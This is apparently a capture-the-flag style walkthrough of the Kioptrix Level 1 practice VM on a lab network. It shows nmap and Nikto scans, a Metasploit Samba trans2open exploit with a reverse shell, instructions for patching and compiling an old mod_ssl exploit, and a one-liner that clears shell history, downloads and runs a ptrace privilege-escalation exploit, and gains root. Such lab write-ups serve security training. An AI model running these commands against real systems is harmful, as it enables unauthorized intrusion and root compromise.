First, to get its IP address, I had to ping sweep the subnet by using:
nmap -sP 192.168.127.0/24
The target's IP address is 192.168.127.153
Results for the nmap scan follow:
nmap -sS -sV 192.168.127.153
Starting Nmap 6.45 ( http://nmap.org ) at 2014-04-24 12:59 EDT
Nmap scan report for 192.168.127.153
Host is up (0.00017s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
32768/tcp open status 1 (RPC #100024)
So. there are a couple of vulnerable services we can exploit. Let's search for Samba exploits, as it's likely to find something useful.
I chose the exploit/linux/samba/trans2open exploit, which I successfully used before. And the payload to go with it will be a standard reverse shell: linux/x86/shell/reverse_tcp
The other options I had to specify were the RHOST (target) and LHOST (local machine). Then just type exploit and let the magic unfold:
Hooray! The box is ours.
Now let's try that outdated Apache server. Here are the results from a Nikto scan against it:
nikto -host 192.168.127.153
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.127.153
+ Target Hostname: 192.168.127.153
+ Target Port: 80
+ Start Time: 2014-04-30 13:10:26 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
+ Server leaks inodes via ETags, header found with file /, inode: 34821, size: 2890, mtime: Wed Sep 5 23:12:46 2001
+ The anti-clickjacking X-Frame-Options header is not present.
+ OSVDB-637: Enumeration of users is possible by requesting ~username (responds with 'Forbidden' for users, 'not found' for non-existent users).
+ OSVDB-27487: Apache is vulnerable to XSS via the Expect header
+ Apache/1.3.20 appears to be outdated (current is at least Apache/2.4.7). Apache 2.0.65 (final release) and 2.2.26 are also current.
+ mod_ssl/2.8.4 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ OpenSSL/0.9.6b appears to be outdated (current is at least 1.0.1e). OpenSSL 0.9.8r is also current.
+ Allowed HTTP Methods: GET, HEAD, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-838: Apache/1.3.20 - Apache 1.x up 1.2.34 are vulnerable to a remote DoS and possible code execution. CAN-2002-0392.
+ OSVDB-4552: Apache/1.3.20 - Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system. CAN-2002-0839.
+ OSVDB-2733: Apache/1.3.20 - Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi. CAN-2003-0542.
+ mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. CVE-2002-0082, OSVDB-756.
+ ///etc/hosts: The server install allows reading of any system file by adding an extra '/' to the URL.
+ OSVDB-682: /usage/: Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-3268: /manual/: Directory indexing found.
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /test.php: This might be interesting...
+ 7355 requests: 0 error(s) and 20 item(s) reported on remote host
+ End Time: 2014-04-30 13:10:47 (GMT-4) (21 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
mod_ssl < 2.8.7 is vulnerable to a remotely exploitable buffer overflow when attempting to cache SSL sessions. This allows for remote code execution, and the modification of any file on the system.
Alright, the exploit is available at http://www.exploit-db.com/exploits/764/
A little modification is necessary because the exploit is old. If we try to compile right away we will get a bunch of errors. So let's make the changes:
- if you don't already have it, install the libssl-dev library:
apt-get install libssl-dev
- add the following lines in the C source code:
#include <openssl/rc4.h>
#include <openssl/md5.h>
- search for wget in the source and replace the URL with the newer one:
http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
- in the get_server_hello function, change the declaration unsigned char *p, *end; to const unsigned char *p, *end;
Now we can compile the exploit:
gcc -o openfuck openfuck.c -lcrypto
Now, if you run it, you will see a range of supported offsets. From our previous scan, we know those applicable to our target are the redhat 1.3.20 versions. We can manually search for them in the offsets or run the following:
./openfuck | grep -i redhat | grep "1.3.20"
This will give us 2 offsets:
0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1
0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2
./openfuck 0x6a 192.168.127.153 443
Establishing SSL connection
cipher: 0x4043808c ciphers: 0x80fe500
Ready to send shellcode
Spawning shell...
Good Bye!
Ok, that one didn't work. Let's try the other one:
./openfuck 0x6b 192.168.127.153 443
Establishing SSL connection
cipher: 0x4043808c ciphers: 0x80fc4e8
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$
bash-2.05$ unset HISTFILE; cd /tmp; wget http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p;
--14:29:59-- http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
=> `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 3,921 [text/x-csrc]
0K ... 100% @ 3.74 MB/s
14:30:00 (3.74 MB/s) - `ptrace-kmod.c' saved [3921/3921]
[+] Attached to 1444
[+] Waiting for signal
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait for suid shell...
whoami
root
And again, we have a shell \@/
Ok, this was the first level in the Kioptrix series. Here's a cookie till next time:
You're a card which will have to be dealt with.
You're a card which will have to be dealt with.
